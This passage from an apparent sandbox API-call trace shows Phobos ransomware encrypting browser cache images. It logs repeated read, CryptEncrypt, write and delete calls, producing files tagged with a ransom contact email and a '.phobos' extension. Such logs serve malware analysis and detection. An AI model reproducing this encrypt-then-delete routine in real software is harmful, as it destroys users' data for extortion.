Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgyIm[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegyim[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgyIm[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegyim[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.369] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.369] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgyIm[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegyim[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.369] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.369] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.369] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3565, lpOverlapped=0x0) returned 1 [0176.473] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3570, dwBufLen=0x3570 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3570) returned 1 [0176.474] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3570, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3570, lpOverlapped=0x0) returned 1 [0176.499] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0176.499] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.499] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.499] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.499] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.499] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.499] CloseHandle (hObject=0x178) returned 1 [0176.499] CloseHandle (hObject=0x148) returned 1 [0176.499] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgyIm[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegyim[1].jpg")) returned 1 [0176.500] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBiyCq[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbiycq[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.501] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=953) returned 1 [0176.501] CloseHandle (hObject=0x148) returned 1 [0176.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBiyCq[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbiycq[1].png")) returned 0x2020 [0176.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBiyCq[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbiycq[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBiyCq[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbiycq[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.501] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.501] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBiyCq[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbiycq[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.502] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.502] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.502] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3b9, lpOverlapped=0x0) returned 1 [0176.530] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3c0, dwBufLen=0x3c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3c0) returned 1 [0176.530] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3c0, lpOverlapped=0x0) returned 1 [0176.531] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0176.531] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.531] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.531] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.531] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.531] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.531] CloseHandle (hObject=0x148) returned 1 [0176.531] CloseHandle (hObject=0x178) returned 1 [0176.531] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBiyCq[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbiycq[1].png")) returned 1 [0176.532] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBnMKeN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbnmken[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.533] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=587) returned 1 [0176.533] CloseHandle (hObject=0x178) returned 1 [0176.533] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBnMKeN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbnmken[1].png")) returned 0x2020 [0176.533] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBnMKeN[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbnmken[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBnMKeN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbnmken[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.533] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.533] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBnMKeN[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbnmken[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.534] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.534] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.534] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x24b, lpOverlapped=0x0) returned 1 [0176.551] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x250, dwBufLen=0x250 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x250) returned 1 [0176.551] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x250, lpOverlapped=0x0) returned 1 [0176.552] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0176.552] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.552] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.552] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.552] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.555] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.555] CloseHandle (hObject=0x178) returned 1 [0176.556] CloseHandle (hObject=0x148) returned 1 [0176.556] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBnMKeN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbnmken[1].png")) returned 1 [0176.557] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBz3ebk[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbz3ebk[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.557] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=876) returned 1 [0176.557] CloseHandle (hObject=0x148) returned 1 [0176.558] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBz3ebk[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbz3ebk[1].png")) returned 0x2020 [0176.558] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBz3ebk[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbz3ebk[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBz3ebk[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbz3ebk[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.558] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.558] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBz3ebk[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbz3ebk[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.559] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.559] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.559] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x36c, lpOverlapped=0x0) returned 1 [0176.582] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x370, dwBufLen=0x370 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x370) returned 1 [0176.582] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x370, lpOverlapped=0x0) returned 1 [0176.583] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0176.583] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.583] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.583] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.583] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.583] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.583] CloseHandle (hObject=0x148) returned 1 [0176.583] CloseHandle (hObject=0x178) returned 1 [0176.583] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBz3ebk[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbz3ebk[1].png")) returned 1 [0176.585] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\chrome-new[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\chrome-new[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.586] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=68716) returned 1 [0176.586] CloseHandle (hObject=0x178) returned 1 [0176.586] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\chrome-new[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\chrome-new[1].jpg")) returned 0x2020 [0176.586] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\chrome-new[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\chrome-new[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\chrome-new[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\chrome-new[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.586] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.587] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\chrome-new[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\chrome-new[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.587] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.587] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.587] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10c6c, lpOverlapped=0x0) returned 1 [0176.597] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10c70, dwBufLen=0x10c70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10c70) returned 1 [0176.597] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10c70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10c70, lpOverlapped=0x0) returned 1 [0176.599] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0176.599] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.599] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0176.599] 